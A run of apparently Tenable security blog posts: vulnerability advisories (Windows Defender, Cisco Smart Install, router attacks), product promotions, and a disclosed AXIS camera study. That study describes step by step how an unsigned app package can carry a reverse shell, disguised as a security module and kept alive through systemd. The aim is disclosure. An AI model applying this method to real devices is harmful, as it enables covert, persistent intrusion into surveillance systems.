Over the years, Microsoft has developed an anti-virus and anti-malware suite of security tools for the Windows environment. However, recently, a critical flaw has been found, which affects Microsoft Malware Protection Engine, or mpengine.dll, the core of Windows Defender in all Windows Defender supported versions of Windows and Windows Server.

According to Microsoft, “a remote code execution vulnerability exists when the Microsoft Malware Protection Engine does not properly scan a specially crafted file, leading to memory corruption. An attacker who successfully exploited this vulnerability could execute arbitrary code in the security context of the LocalSystem account and take control of the system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”

Impact assessment

By default, on all Windows 10 systems, Windows Defender’s real-time protection is turned on. This means the Microsoft Malware Protection Engine (MMPE) will scan files automatically, leading to exploitation of the vulnerability when the specially crafted file is scanned. Because the MMPE component automatically scans all incoming files by default, no user interaction is needed to exploit the flaw. However, if real-time scanning is not enabled, the attacker would need to wait until a scheduled scan occurs in order for the vulnerability to be exploited. Due to the vulnerability affecting all Windows products that support Windows defender, a successful exploit can be used by an attacker to install programs, view, change or delete data, or even create new accounts with full user rights.

Exploitation

Microsoft credited Thomas Dullien, of Google Project Zero, for discovering the vulnerability in his research of Windows Defender and RAR files. In the assessment, Microsoft states, “To exploit this vulnerability, a specially crafted file must be scanned by an affected version of the MMPE.”

There are several ways an attacker may exploit the vulnerability by placing a crafted file in a location scanned by the MMPE:

• One of the most common ways to exploit this vulnerability is through an email message or Instant Messenger message that is scanned when the file is opened.
• Attackers can take advantage of websites that host user-provided content by uploading a file to a shared location that would be scanned by MMPE, triggering the exploit.

Urgently required actions

As a critical security need, the patch for CVE-2018-0986 is being released only a week before Microsoft's regular monthly security update. Typically, administrators or end users would not need to take action for the updates to install, as built-in tools exist for deploying updates automatically to the affected products. Updates should be installed within 48 hours by the Microsoft update process. However, given the ease of exploitation of the vulnerability, we recommend installing the update as soon as possible.

If a system is not controlled by an enterprise updating system, a user can manually update by simply opening Windows Defender, clicking the update tab and performing the update to trigger the download/installation of the new MMPE. To verify your system has been updated, please compare versions with the chart below.

Identifying affected systems

All Windows Defender supported versions of Windows and Windows Server are affected by this vulnerability.

• Nessus Plugin ID: 108813 Desc: Microsoft Malware Protection Engine < 1.1.14700.5 RCE

Get more information

• Microsoft Security Update
• CVE Details
• Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface
• Get a free 60-day trial of Tenable.io Vulnerability Management

Tenable.io users have been asking for new dashboards to make implementing Cyber Exposure easier, and the Tenable dashboard and reporting teams have delivered. We’ve added five new dashboards to Tenable.io, allowing you to gain more visibility into key topics like vulnerability metrics, risk mitigations and exploit reporting.

These five new dashboards are popular dashboards available in SecurityCenter, now upgraded for the Cyber Exposure Lifecycle. Let’s take a peek:

#1. Executive Summary dashboard

The Executive Summary dashboard takes into account several metrics available in Tenable.io and allows you to narrow the search down to a few key metrics (e.g., severity, Common Vulnerabilities and Exposures [CVE] identifier and vulnerability state). I find this dashboard useful when talking to executives about their Cyber Exposure initiative and measuring their organization's cyber risk.

Executives can easily review and analyze security metrics, taking away a better understanding of the maturity of the Cyber Exposure Lifecycle. As the security director introduces the Cyber Exposure discipline to the organization, they can use this dashboard to measure the modern attack surface to accurately understand and reduce cyber risk. The discipline helps executives to better direct and focus mitigation efforts and report using industry-accepted metrics. Tenable.io facilitates the implementation of the five Cyber Exposure Lifecycle steps and provides a common place for analyzing vulnerability data.

#2. Exploitable Framework Analysis dashboard

When discussing Cyber Exposure with security teams, one key metric is exploitability and how easily can a vulnerability be exploited. The Exploitable Framework Analysis dashboard provides you with information needed to predict which assets are most likely to be compromised when attacked.

To further analyze the network, security teams often conduct internal penetration testing. The National Institute of Standards and Technology (NIST) 800-53 control CA-8 Penetration Testing defines penetration testing as “a specialized type of assessment conducted on information systems or individual system components to identify vulnerabilities that could be exploited by adversaries.” To aid in this specialized assessment, security teams use exploitation frameworks such as Core Impact, Canvas and others. This dashboard provides you with a centralized view of which frameworks are most commonly found on vulnerabilities in your network.

#3. Measure Vulnerability Management dashboard

When creating the Measure Vulnerability Management dashboard, our goal was to provide a very complete view into the Cyber Exposure discipline progress. We also designed the dashboard to assist the IT security team by organizing the vulnerability management data.

The dashboard follows guidelines outlined in many of the emerging security frameworks. Beginning with a Common Vulnerabilities and Exposures (CVE) matrix, you can easily zero in on vulnerabilities identified by security advisories. Next, a matrix provides you with several saved searches that help identify hidden vulnerabilities or can assist in looking for compromised systems. The dashboard shows enumerated software, running process and other sources of system resource usage. As part of the server management team or security team, you’ll be able to benefit from these widgets.

To help the vulnerability management team, there’s useful data about how scans are executed and which operating systems have the most vulnerabilities. When analyzing vulnerabilities by operating system, I often recommend using the plugin family, which allows you to visualize vulnerabilities that often have common support teams and patching cycles. This vulnerability data is then further grouped into columns of escalation grouping, consisting of CVSS, exploitability and if there’s a patch available or not. Lastly, if you’ve accepted or recast vulnerabilities, this dashboard provides information to help you monitor risk acceptance.

#4. Mitigation Summary dashboard

The Mitigation Summary dashboard helps illustrate Cyber Exposure progress to management and show the work remaining. Each widget in this dashboard has five columns: The first uses the vulnerability state tag to provide a list of vulnerabilities that have been fixed. The remaining columns provide insight into the remaining work. Each matrix focuses on a different aspect of Cyber Exposure.

Using the CVSS base score helps risk managers do a quantitative analysis by rating each vulnerability with computational score. Another metric I find useful for discussing Cyber Exposure with auditors is CVE. This dashboard provides an easy way to see how many CVEs have been mitigated and how many remain outstanding. Finally, grouping vulnerabilities by operating system is helpful when looking for patch management and change control operations. This information allows you to monitor the process of patch deployment as numbers move from the right unmitigated column to the mitigated column.

#5. Security Management Summary dashboard

The Security Management Summary dashboard is used primarily to identify the vulnerabilities and cyber risk that need to be mitigated. When using this dashboard, I can easily view the Transmission Control Protocol (TCP) ports found on the network. Using the native drill-down features, I can easily identify all the vulnerabilities with each port.

The dashboard also shows me the most prevalent vulnerabilities by CVE. The CVEs in this dashboard can easily be prioritized and mitigated. I use this dashboard to identify the common operating systems and the Linux and Windows hosts most at risk. In a nutshell, this dashboard helps you prioritize risk mitigation efforts.

Wrapping up

Tenable.io contains a wealth of data to help managers, security teams and executives understand and minimize the cyber risk within your organization. These dashboards provide a more centralized view of several useful metrics, such as mitigated vulnerabilities, CVSS Scores, CVE and many others. By using this technology, your company can be successful in identifying and mitigating cyber risk.

Look before you leap is excellent advice for security leaders to heed before they select security solutions to reduce Cyber Exposure in Operational Technology (OT) environments. And, who is better qualified to deliver that advice than Gartner?

Gartner recently published a research note, 7 Questions SRM Leaders Aren’t Asking OT Security Providers During Technology Selection, to help you define important requirements for OT security that you might have overlooked. I’ll outline how Tenable Industrial Security can help you address each question Gartner asks in the research report.

#1. “Is the solution vendor-agnostic?”*

Supporting a variety of Industrial Control System (ICS) assets requires an understanding of a variety of protocols. Tenable Industrial Security monitors a wide variety of protocols commonly used by OT devices, including BACnet, CIP, DNP3, Ethernet/IP, ICCP, IEC 69-0870-5-104, IEC 60850, IEEE C37.118, Modbus/TCP, OPC, openSCADA, PROFINET, Siemens S7 and more.

However, protocol support is just the start – support for your specific OT devices is also required. Industrial Security supports systems from dozens of manufacturers, including Siemens, ABB, Emerson, GE, Honeywell, Rockwell/Allen-Bradley and Schneider Electric. Additionally, Tenable commonly works with customers to add support for specific devices, as needed.

#2. “Does the solution provide asset discovery to enable operational continuity and system integrity?”*

Asset discovery is core to virtually all OT compliance requirements and best practices. Asset discovery is challenging in IT environments. It’s even more difficult in OT environments because actively scanning OT networks can disrupt or degrade operations. Therefore, Gartner recommends, “Ensure the solution passively scans and analyzes industrial network communications, provides information about network assets, provides advanced anomaly detection, and alerts in real time for any threat to operational continuity and system integrity.”*

Industrial Security includes Nessus Network Monitor passive sensors, which safely and continuously monitor OT networks to detect and identify assets active on the network. They detect new assets added to the network, passively determine the operating system and display machine-to-machine connections.

#3. “Does the solution detect and alert on known common vulnerabilities and exposures?”*

Gartner’s research note says, “A platform that incorporates known CVE discovery into the security policy will provide faster detection, as well as provide value from Day 1 of its deployment.”* Industrial Security patented vulnerability analysis technology identifies vulnerabilities in sensitive OT systems that cannot be actively scanned due to the risk of disruption or performance impact. Reports present the vulnerability information is a variety of formats. And alerts for critical vulnerabilities can be sent to SIEMs.

#4. “Can the solution evolve from mirror-mode to in-line security?”*

Gartner states, “SRM leaders in many industries will typically prefer to deploy their OT security systems in passive, detection-only mode (mirror-mode), while disabling active preventive capabilities, as older PLCs will stop working when any unexpected traffic touches them. This is a sensible starting point, which reduces the risk of unplanned impact on the operational technology network. However, in certain industrial control systems, as these leaders gain trust with their solution configuration, they will often want to evolve to in-line deployment, which provides some level of active prevention.”* This evolution allows you to increase the depth of detection and analysis where it makes sense.

In addition to Industrial Security passive detection and analysis, Tenable.io Vulnerability Management offers both active scanning and agents for use with IT-based and other robust assets deployed in OT environments. You can easily evolve your approach as you gain confidence.

#5. “Does your solution provide IT support in addition to OT?”*

Gartner states that, “Most OT attacks in the last 10 years started at the more accessible IT network. Security vendors that provide both IT and OT detection may detect an attack at earlier stages, before it enters the OT network, allowing more time to respond and remediate. Obviously, the solutions under consideration must support unique OT security needs, such as protecting OT protocols, supplier remote access to OT equipment and deep packet inspection (DPI). But in addition to OT detection, IT detection, monitoring, and visibility capabilities must be supported as well.”*

Tenable understands that interconnected OT and IT systems cannot be secured in isolation. Our solutions span Industrial-IoT/ICS/SCADA, the cloud and traditional IT, including network devices.

#6. “Does your solution support secure IT/OT alignment?”*

This question addresses the trend to use IT infrastructure in OT architecture layers and the potential risk of using IT security practices and technology that may not be well-suited to OT.

Tenable understands that active security technologies appropriate for IT environments may disrupt and/or degrade performance in OT environments. We’ve provided both active and passive technologies for more than 10 years, and the passive technology understands OT-related protocols.

#7. “Is the solution designed to live in an OT environment from a hardware or operating environment perspective?”*

Industrial Security can be installed on your choice of hardware, including rugged servers designed to operate in harsh conditions. Industrial Security implementations are configurable to meet your network and physical architecture requirements. For example, you can install Industrial Security at each of multiple sub-stations and roll up the results to a master instance for overall visibility.

Please take 10 minutes to read a complimentary copy of Gartner’s research note, 7 Questions SRM Leaders Aren’t Asking OT Security Providers During Technology Selection. If you’d like to discuss your OT security needs, contact us now.

*Gartner, “7 Questions SRM Leaders Aren't Asking OT Security Providers During Technology Selection,” Saniye Burcu Alaybeyi, 11 January 2018.

There’s been a flurry of activity around the Cisco Smart Install feature recently. Last week, we posted a tech blog about CVE-2018-0171, a critical vulnerability in Cisco’s Smart Install feature that called for immediate mitigation as proof-of-concept code was released publicly. Now, a wave of attacks has moved through data centers across the internet targeting Cisco switches with Smart Install in various countries across the globe. This time around, attackers are (mis)using the Smart Install protocol with mal intent on Cisco’s switches that are open with Smart Install support. Once the attacker gains access, they rewrite the Cisco IOS image on the switches and change the configuration file. One such attack leaves a message that reads “Do not mess with our elections” as the message banner. The switch then becomes unavailable. 

Impact assessment

According to Cisco Talos, more than 168,000 devices found on Shodan have this vulnerability. The rate at which Cisco switches are being taken down isn’t known at this time. But, the loss of a switch can have a small to enormous impact on a data center, depending on the network architecture. Cisco switches utilized for internet connectivity may cause lost connectivity if they’re taken down. Any business that hasn’t mitigated their switches could experience a loss in connectivity affecting sales, productivity or customer interaction.

Exploitation

According to Cisco, “The Cisco Smart Install protocol can be abused to modify the Trivial File Transfer Protocol (TFTP) server setting, exfiltrate configuration files via TFTP, modify the configuration file, replace the IOS image, and set up accounts, allowing for the execution of IOS commands. Although this is not a vulnerability in the classic sense, the misuse of this protocol is an attack vector that should be mitigated immediately.”

Cisco released an advisory on the security of Smart Install last year and reiterated their advice last week.

Urgently required actions

Cisco and Tenable suggest immediate mitigation of Cisco switches by:

• Limiting access through an Access Control List
• Limiting access to TCP 4786 port
• Disabling the Smart Install Client on the switch
  

Identifying affected systems

• Cisco has released an open-source tool that scans for devices which use the Cisco Smart Install protocol
• Tenable uses plugin 105161 for Cisco Smart Install detection

Get more information

• Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface
• Get a free 60-day trial of Tenable.io Vulnerability Management

Tenable Research recently audited an AXIS M3044-V network camera and learned that AXIS has introduced an application platform to their cameras. The camera even came with an app pre-installed: AXIS Video Motion Detection. During the audit, we discovered that it’s possible for a malicious actor to tamper with the firmware and replace it with a malicious package.

Background

The AXIS M3044-V is a networked mini dome surveillance camera marketed to stores, hotels, schools, banks and offices for physical security and CCTV.

The AXIS Camera Application Platform (ACAP) is an open application platform that enables third-party developers to develop applications that can be installed on AXIS network cameras and video encoders.

From an attacker’s perspective, an application platform on an embedded device is interesting because it could make distributing and installing malware easy. Creating custom malicious firmware can be time-consuming and difficult. Furthermore, many embedded systems require digitally signed firmware which, to say the least, presents the attacker with a real challenge. You might be thinking that a well-written application platform would also require signed apps. Let’s see what AXIS did.

Analysis

The first thing we need to know is the format AXIS expects for an app. From the image below, you can see that the camera is expecting the application to have an eap extension.

Thankfully, since the camera comes with an application pre-installed, you can find an eap file in the firmware. An eap turns out to be just a gzip compressed tar.

When decompressed, the package reveals a fairly simple format: a binary, a couple of configuration files and some HTML.

The package.conf file appears to contain all the instructions for installing and executing the vmd binary.

The obvious approach to creating our custom application is to simply replace vmd with our own binary. Pursuant to that goal, I generated a little endian ARM reverse shell using msfvenom to replace vmd. I recompressed the package and tried to upload it. Unfortunately, I received an “It did not work!” error message. Could the application be signed in some way? Maybe there’s an API the binary needs to adhere to?

Before racing down those rabbit holes, let’s look at the POSTINSTALLSCRIPT field in package.conf. That sounds like it’ll execute a script of our choosing, right? To test this, I returned the vmd binary back to its original state, renamed my reverse shell to rev_shell.bin, created a bash script called rev_shell.sh to execute the reverse shell and changed the package.conf file to include POSTINSTALLSCRIPT=”rev_shell.sh.”

After repackaging the eap and uploading, I received this:

It appears we don’t have to worry about any type of package signing. Also, worth noting, we overwrote the original VMD install. Pretty neat! The problem now is that our reverse shell only starts after installation. That means any type of reboot will remove our connection to the camera. Also, since we overwrote VMD, a future update could remove our modifications. Let’s see if we can craft our own application to work around these things.

Since this isn’t an attempt to be stealthy, the first step to avoid being overwritten by future updates is to create our own application. This is easily done by changing a couple of items in the configuration file. Since our goal is to have our application installed by unwitting third parties (or not removed if we have some sort of supply-chain attack going on), we’ll name our application “AXIS IoT Security Module” and rename vmd appropriately:

Next, update the post install script to register the reverse shell with systemd:

And you’re good to go. Repackage all the files into an eap and, once again, you’ll get a reverse shell. And now the shell will come back up if the camera gets rebooted or there’s a firmware update. However, note that the reverse shell won’t survive a factory reset.

Vendor response

Following our Responsible Disclosure policy, we originally reported these, and other, findings to AXIS in late August 2017. After some discussion, their final statement was the following:

Business impact

A malicious package installed on the camera can be used to distribute malware to legitimate users or as a pivot point to execute lateral transfer. Physical security and CCTV operations can also be compromised.

Solution

While Tenable currently doesn’t offer a plugin that directly checks for tampered firmware, our AXIS web interface detection plugin will help customers to identify deployed AXIS cameras to determine their exposure to this kind of attack.

Tenable recommends that affected devices are deployed in segmented networks with access and authentication control to restrict usage to approved users.

Tenable Research has a dedicated team that performs vulnerability research on software and hardware from third-party vendors. The goal is to discover zero-day vulnerabilities and work with vendors to get them addressed before hackers discover and exploit them.

This post provides an overview of all the vulnerabilities discovered by Tenable Research in February and March.

You can access all Tenable Research advisories here.

The concept of a smart city came of age in conjunction with another now ubiquitous term: digital transformation. Cities and counties rely heavily on their taxing authority to provide critical services such as public safety, public works and infrastructure maintenance. By using the latest IP-enabled technology, local jurisdictions, or smart cities, can improve the efficiency of service delivery, freeing up revenues to support additional – or enhanced – services to their residents.

Smart cities: New opportunities for service delivery, new vectors for risk

As great as this concept sounds, it’s already experienced some headwind as various initiatives get closer to being operational, with none more significant than the maintenance of cyber hygiene and integrity of information security.

Smart cities have fundamentally outkicked their coverage on information security as they’ve adopted their digital transformation plans. Digitizing local services has expanded the attack surface, potentially creating greater liability than the benefits offered from their adoption. IT departments are focused on maintaining uptime for users as well as gathering and analyzing the data that drives effective provisioning of services. Digital transformation of smart cities will spread the local IT shops very thin by adding new projects that must be completed concurrent to the smart city initiatives. The adoption of cloud computing strategies and the integration of large numbers of IoT devices are among the list of projects they’ll need to tackle.

Many cities are moving to cloud computing to deal more efficiently with the deluge of data necessary to manage smart city initiatives. This will expand the cyber attack surface beyond the the usual confines of the local IT world. Adding smart devices such as refuse containers, streetlights and parking meters will add a plethora of new IoT integration challenges. Finally, municipally owned utilities will create an integration of IT and operational technology (OT) that may be well beyond IT’s current capabilities.

So, is this expanding attack surface a mystery to local IT departments? Nope, and it’s not a mystery to the black-hat hackers who want to disrupt local services and perhaps siphon off the benefits of these services undetected. Say a city-owned utility utilizes a number of IoT devices to manage the distribution of power or water to local residents. Being able to manipulate those IoT devices to provide more or less of those services to certain residents could be of tremendous financial value to a threat actor. And the truth is, this activity could go undetected for an extended period of time without the introduction of an enhanced – and coordinated – Cyber Exposure capability.  

How can smart cities address the expanding attack surface?

Smart cities can ensure they’re addressing this expanded cyber attack surface by creating a set of S.M.A.R.T. information security goals to go along with their digital transformation goals:  

Specific – Ensure each smart city digital transformation initiative has a specific Cyber Exposure corollary. For example, if introducing digital waste disposal systems is a smart city goal, ensure both the IoT devices and software that manages them are actively and passively scanned, as appropriate. In other words, don’t “outkick the coverage” and implement an initiative without addressing the potential vulnerabilities it may present.  

Measurable – Information security standards apply to the expansion of smart city initiatives. Ensure a process is in place to automate the reporting of known vulnerabilities and their threat level. And make this information available to the executive suite via clear, concise dashboard reporting.

Attainable – Although smart city digital transformation has great promise, it also gives threat actors a wider set of potential targets. Cities and counties should be very deliberate about how they bring initiatives online, so the benefits are attainable without a corresponding increase in potential liabilities due to expanding the attack surface too quickly. The public will appreciate the benefit over time, but will damn the risks immediately if there’s a breach.  

Reasonable – Not every city and county will have the time or resources to implement every single smart city initiative. It just won’t happen. The reasonable path is to ensure the risk of threats is never greater than the pace of implementation.  

Time-Specific – In the digital age, a year is what five years used to be. Moore’s law is still in effect, and digital progress is not slowing down. However, local government remains first and foremost a provider of services at the most basic level: power, water, sanitation and transportation, to name a few. Those have not changed. The challenge is to ensure that digital transformation time frames don’t shift the focus from the provisioning of services to the completion of digital transformation. That would be exactly what the threat actors want– and the resulting disruption could fracture the public trust for years.  

For more information about how to address the expanding attack surface, join us at GovEdge on May 3.

In today’s digital economy, it has become paramount for companies to defend customers from malicious attacks by criminal enterprises and nation states.

This is why Tenable, along with 33 other companies including Microsoft, DocuSign and LinkedIn have signed the Cybersecurity Tech Accord. This pledge is a pact among the largest-ever group of tech and cybersecurity companies to fight cyberattacks and improve foundational cyber hygiene at all levels.

Cybersecurity Tech Accord: the four pillars

The four pillars of the pact represent key areas that we have pledged to improve:

• Stronger defense – Companies will mount a stronger defense against cyberattacks.
• No offense– Companies will not assist governments in launching cyberattacks and will protect against the exploitation of products through every stage.
• Capacity building– Companies will do more to empower developers and the people and businesses who use their technology, helping them improve their capacity for protecting themselves.
• Collective action– Companies will build on existing relationships and together establish new formal and informal partnerships with industry, civil society and security researchers.

Although Tenable has always been committed to helping organizations accurately understand and reduce their Cyber Exposure, we realize that no one company or technology will secure cyberspace.

Cybersecurity professionals have a collective responsibility to protect everyone online

The growing threat of cyberattacks and offensive cyber weapons endangers all of us, from consumers and private businesses to government agencies. As cybersecurity professionals, we have a social responsibility to protect everyone online and support foundational cyber hygiene practices among private citizens and organizations of all sizes. We’re committed to empowering organizations everywhere to understand and reduce their cybersecurity risk. That’s always been our mission as an organization, and this accord solidifies that commitment.

We believe collective action by local and global companies will help drive significant change and ensure a safer and more secure future. That begins by making cybersecurity top of mind.

For more information about the Tech Accord, visit: www.cybertechaccord.org

Based on the recent surge of attacks on network devices by Russian state-sponsored cyber actors, the US-CERT has released Technical Alert (TA18-106A). As of now, targets are primarily government and private-sector organizations, critical infrastructure providers and the internet service providers (ISPs) that support U.S. infrastructure. Tenable has warned about such attacks before, including as recently as last week.

Impact assessment

Network devices are ideal targets because all traffic must traverse these critical devices. Organizations that use legacy, unencrypted protocols to manage hosts and services make successful credential harvesting easy for cyber actors. An attacker who has gained access to an organization’s gateway router can monitor, modify and deny traffic to and from the device. Simply put, whoever controls the router controls the data flowing through it.

According to the US CERT, Russian state-sponsored cyber actors have conducted both broad-scale and targeted scanning of internet address spaces. Broad scanning helps attackers identify enabled internet-facing ports and services, conduct device fingerprinting and discover vulnerable network infrastructure devices. Vulnerable protocols targeted in this scanning include:

• Telnet (port 23)
• HTTP (port 80)
• SNMP (port 161/162)
• SMI (port 4786)

However, an attacker who gains control of a router between Industrial Control Systems – Supervisory Control and Data Acquisition (ICS-SCADA) sensors and the controllers in a critical infrastructure, such as the energy sector, can manipulate the messages, creating dangerous configurations that could lead to loss of service or physical destruction.

Vulnerability details

For several years now, cyber actors have been targeting and exploiting enterprise-class and SOHO/residential routers and switches worldwide. Many times, cyber actors do not need to leverage zero-day vulnerabilities or install malicious software to exploit these devices. Instead, these cyber actors rely on legacy, weak protocols and services associated with network administrative activities.

Network devices like routers and switches are often easy targets because they’re typically not maintained to the same standard as other devices, such as desktops and servers. Many times, default accounts and passwords are not changed, firmware is not updated and devices are not hardened. Devices such as SOHO and residential routers are most vulnerable. Once compromised, they can be used to pivot to other devices.

These weak security practices may enable cyber actors to:

• Identify vulnerable devices
• Extract device configurations
• Map internal network architectures
• Harvest login credentials
• Masquerade as privileged users

Additionally, cyber actors may be able to modify device firmware, operating systems and configurations as well as copy, modify, deny or redirect traffic. Often, these cyber actors are successful because the devices:

• Have legacy unencrypted protocols or unauthenticated services running
• Have not been sufficiently hardened or are no longer supported (EOL)
• Have not been updated or patched

All these factors give cyber actors the ability to potentially gain both intermittent and persistent access to critical infrastructure.

Exploitation

In many cases, exploitation begins with a brute force attack against Telnet and SSH to obtain login credentials. Weak and commonly used passwords or passwords that have previously been harvested by illicit activities are used for exploitation. However, if default accounts exist, credentials can be easily obtained, which will give full access to these devices. Password hashes may also be extracted from configurations via Simple Network Management Protocol (SNMP) and Cisco Smart Install (SMI) enabled device scanning.

Urgently required actions

Tenable suggests analyzing the network to determine whether any of the specific services listed below are running and/or ports are open. Refer to the vendor-specific guidance for the make and model of network devices in operation.

The US-CERT recommends that all organizations take the following actions:

• Do not allow unencrypted (i.e., plain text) management protocols (e.g., Telnet) to enter an organization from the internet. When encrypted protocols such as SSH, HTTPS or TLS are not possible, management activities from outside the organization should be done through an encrypted VPN where both ends are mutually authenticated.
• Do not allow internet access to the management interface of any network device. The best practice is to block internet-sourced access to the device management interface and restrict device management to an internal trusted and whitelisted host or LAN. If access to the management interface cannot be restricted to an internal trusted network, restrict remote management access via encrypted VPN capability where both ends are mutually authenticated. Whitelist the network or host from which the VPN connection is allowed, and deny all others.
• Disable legacy unencrypted protocols such as Telnet and SNMPv1 or v2c. Where possible, use modern encrypted protocols such as SSH and SNMPv3. Harden the encrypted protocols based on current best security practices. DHS strongly advises owners and operators to retire and replace legacy devices that cannot be configured to use SNMPv3.
• Immediately change default passwords and enforce a strong password policy. Do not reuse the same password across multiple devices. Each device should have a unique password. Where possible, avoid legacy password-based authentication, and implement two-factor authentication based on public-private keys. See NCCIC/US-CERT TA13-175A– Risks of Default Passwords on the Internet, last revised October 7, 2016.

Further detailed information can be found in the ‘Solution’ and ‘General Mitigation’ section of the US-CERT Alert (TA18-106A).

Identifying affected systems

Tenable has pre-existing detection via these Nessus plugins:

• 99233, Cisco IOS Smart Install Protocol Misuse
• 105161 for Cisco Smart Install detection

Get more information

• US-CERT Alert (TA18-106A)
• Cisco Smart Install - How to Prevent Attacks on Switches
• Cisco Smart Install Protocol Misuse
• Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface
• Get a free 60-day trial of Tenable.io Vulnerability Management

CyberScoop’s Opportunities for Improving Cybersecurity Visibility at State & Local Government Agencies is an outstanding summary of the current state of cyber preparedness in state and local government agencies. Like most survey summaries, it presents the results as cold, hard facts. It also, in some respects, is comparative, and in a way not unlike the study of comparative politics.  

In analyses of any subject related to IT in the state and local government sector, there are always unconscious comparisons to the private sector. The question many people ask when they encounter statistics related to state and local government is: “Why can’t the state (or city, or county) be run more like a business?”

The truth is that government – especially state and local government – can be more businesslike, but it will never be run like a business. The reason is political practicality.

There is one federal government, 50 state governments, 3,800 county governments and more than 18,000 local governments. As you move down that continuum, the amount of citizen (read: voter) involvement increases exponentially. Political practicality dictates that constituent issues be addressed with greater velocity as the size of the government entity gets smaller. This greatly affects the ability for government to address broader issues like cybersecurity. It also means that a greater proportion of the limited government funds are used to address the most pressing constituent issues, which leaves less for the IT line items.

Looking at the results of the recently released CyberScoop survey, Opportunities for Improving Cybersecurity Visibility at State & Local Government Agencies, through the lens of political practicality puts it in clearer context and suggests how the private sector can better assist state and local governments in improving their cyber hygiene and their Cyber Exposure posture. Let’s look at some of the findings:

“Half of state and local IT leaders face a shortage of skilled cybersecurity talent.”

Cyber analysts don’t put out fires, get cats out of trees or drive police cars and make arrests. The vast majority of city revenues go toward public safety. So, let’s put cybercrimes under the jurisdiction of the chief of police. This would certainly make it easier to request and appropriate funds. It would also make those jobs more attractive to those who want to work in local government to “serve and protect.” The private sector can create “weaponized” cyber tools for the exclusive use of local law enforcement.

“The findings clearly suggest a widespread, if not urgent, need for tools that can provide real-time situational awareness across a variety of networks.”

In the hierarchy of IT funding in state and local government, tools are always going to be underfunded because they don’t involve people doing things. It’s that simple: Local constituents see people – “feet on the street” – as the solution to local issues. Creating SaaS applications that minimize investments are critical to correcting this under-investment. Cooperatives of states or cities throughout a region are common, and a “cyber cooperative” would be a logical extension of that concept. For example, Southeastern Georgia has a “Cybersecurity District” that allows governments to pool cybersecurity resources.

“Adding to that challenge is the lack of control those officials have over systems and devices operating beyond their security infrastructure, including third-party contractors.”

Political winds change often, especially when new administrations come in with mandates to address specific issues. This often leads to IT builds that are purportedly “platform agnostic,” but also “disintegrated.” This “disintegrated” set of solutions creates an expanded cyberattack surface by increasing the number of patches and upgrades necessary to ensure compliance with standards. Suggesting a “cyber integrator” model that provides both tools and professional services to address this concern would be a breakthrough for local CIOs, especially. Adding the need to integrate – in advance – each new IT initiative with existing Cyber Exposure tools and approach would be a game-changer. It would likely require statutory or local ordinance enforcement, but it would create consistency in the ever-changing political landscape.

For a full look at the survey results, download the CyberScoop report today.

In 2016, Tenable was the first Center for Internet Security (CIS) member to receive certification for the Amazon AWS Foundations benchmark. We’re pleased to announce that we’ve continued our leadership in orchestrating compliance for Amazon Web Services (AWS) environments by becoming the first and only vendor to obtain CIS certification for the AWS Three-tier Web Architecture benchmark.

AWS Three-tier Web Architecture overview

There are numerous considerations when you’re contemplating building an AWS web architecture in the AWS cloud. One popular pattern to use is an AWS three-tier architecture consisting of internet, application and database tiers. The internet tier, or web tier, contains the web servers necessary to drive functionality from the application tier. The application tier represents the user components, and the data tier consists of storage media which hold the data relevant to the application. Tenable.io® and the CIS benchmark assist customers with compliance and improve their overall security for an AWS Three-tier architecture.

Why audit an AWS Three-tier Web Architecture?

CIS security benchmarks provide organizations a baseline for securing resources and products. AWS is at the forefront of the cloud computing services. With the complexities associated with the cloud, this benchmark along with Tenable.io assists those customers searching to secure their AWS overall security posture. A secure AWS architecture is vital for an organization’s security hygiene. An example setting found in the benchmark is enabling encryption at rest within Relational Database Service (RDS). Without this configuration, an organization is risking their confidentiality of data stored in RDS.

In today’s security landscape filled with data transformation, it’s paramount to protect and audit your AWS environment. Tenable customers now have the ability to continue closing their Cyber Exposure gap by auditing their AWS Three-tier Web Architecture based upon the CIS benchmark.

CIS Amazon Web Services Three-tier Web Architecture Benchmark

CIS released the AWS Three-tier Web Architecture benchmark on the heels of releasing the latest CIS AWS Foundations Benchmark update. The AWS Three-tier Architecture Benchmark expands on the security configurations found in the Foundations Benchmark. It’s recommended that configurations found in the Foundations Benchmark be applied prior to completing the security settings found in the Foundations Benchmark. The following services are within scope of the benchmark:

• Elastic Compute Cloud (EC2) - API Version 2016-04-01
• Virtual Private Cloud (VPC) - API Version 2016-04-01
• Identity and Access Management (IAM) - API Version 2010-05-08
• AWS Config - API Version 2014-11-12
• CloudFront CDN - API Version 2016-01-13
• CloudWatch - API Version 2010-08-01
• Amazon Relational Database Service (RDS) - API Version 2014-10-31
• Simple Notification Service (SNS) - API Version 2010-03-31
• AWS Certificate Manager (ACM) - API Version 2015-12-08
• Key Management Service (KMS) - API Version 2014-11-01

The benchmark is divided into multiple sections:

Data protection

Data protection provides the security configurations necessary for protecting data that’s in transit and at rest. Key recommendations include:

• Ensuring databases running on RDS and all EBS volumes are encrypted
• Elastic Load Balancing (ELB) have the appropriate SSL Certificate and are using HTTPS listener
• All S3 buckets have secure policies enabled that require encryption for objects stored in buckets

Identity and access management

Identity and access management expands on the Identity and Access Management (IAM) section found in the Foundations benchmark. It builds upon the level of security for identification and access to the different AWS resources:

• Ensuring IAM policies exist for the EC2 IAM roles
• AutoScaling Group Launch-Configurations are configured appropriately
• SNS Topics do not allow the “Everyone” group to publish and subscribe

Business continuity

In today’s world, cybersecurity concerns and business continuity are inseparable. This section provides recommendations to help organizations build an effective AWS resiliency plan:

• Auto-Scaling Groups are associated with an ELB and are configured for multiple Availability Zones (AZs)
• Amazon Machine Images (AMIs) are configured for the Auto-Scaling Launch Configuration
• RDS backup retention policies are set in place

Event monitoring and response

Event monitoring and response builds off the Foundations Benchmark and includes detecting and responding to AWS events:

• SNS topics include appropriate notification for CloudWatch alarms
• RDS event subscriptions are enabled
• CloudWatch alarms are created for logs

Audit and logging

Continuing off the auditing and logging section for the Foundation benchmark, this section provides configurations necessary to support auditing AWS:

• Logging for ELB and CloudFront is enabled
• CloudWatch log groups are created
• Config rules for encrypted volumes are applied
• Config rules for EIPs are attached to EC2 instances

Networking

The networking section adds recommendations that provide security for the default virtual private cloud (VPC):

• Enable CloudFront content distribution network
• Ensure subnets are configured for each tier
• Routing tables have the default route defined to allow connection to the VPC gateway
• ELB Security Group is configured to accept HTTPS only

